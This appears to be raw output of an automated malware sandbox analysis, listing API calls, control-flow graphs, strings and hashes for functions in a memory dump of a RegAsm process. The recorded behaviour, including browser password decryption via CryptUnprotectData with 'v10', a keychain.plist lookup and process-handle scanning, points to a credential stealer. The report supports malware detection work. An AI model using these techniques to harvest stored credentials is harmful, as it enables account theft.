API calls 40337->40340 40338->40332 40341 41ee6b 85 API calls 40339->40341 40342 41f2e0 40340->40342 40341->40330 40344 41b1ca memset 40342->40344 40343->40328 40344->40330 40345->40270 40346->40270 40347->40270 40348->40264 40349->40265 40350->40279 40351->40282 40352->40282 40353->40282 40354->40282 40355->40282 40356->40300 40357->40284 40358->40287 40359->40290 40360->40298 40361->40308 40362 41493c EnumResourceNamesW 40363 44660a 40366 4465e4 40363->40366 40365 446613 40367 4465f3 __dllonexit 40366->40367 40368 4465ed _onexit 40366->40368 40367->40365 40368->40367

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                      • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                      • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                      • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                      • API String ID: 2018390131-3398334509
                                                                                                                                                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1355100292-0
                                                                                                                                                                      • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                      • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                      APIs
                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1945712969-0
                                                                                                                                                                      • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                      • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$FirstNext
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1690352074-0
                                                                                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                                                                                      • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoSystemmemset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3558857096-0
                                                                                                                                                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                      • API String ID: 2334598624-3798722523
                                                                                                                                                                      • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                      • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                      • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                      • API String ID: 1442760552-28296030
                                                                                                                                                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                      • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                      • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                      • String ID: chp$v10
                                                                                                                                                                      • API String ID: 229402216-2783969131
                                                                                                                                                                      • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                      • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                      • API String ID: 3957639419-1740548384
                                                                                                                                                                      • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                      • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
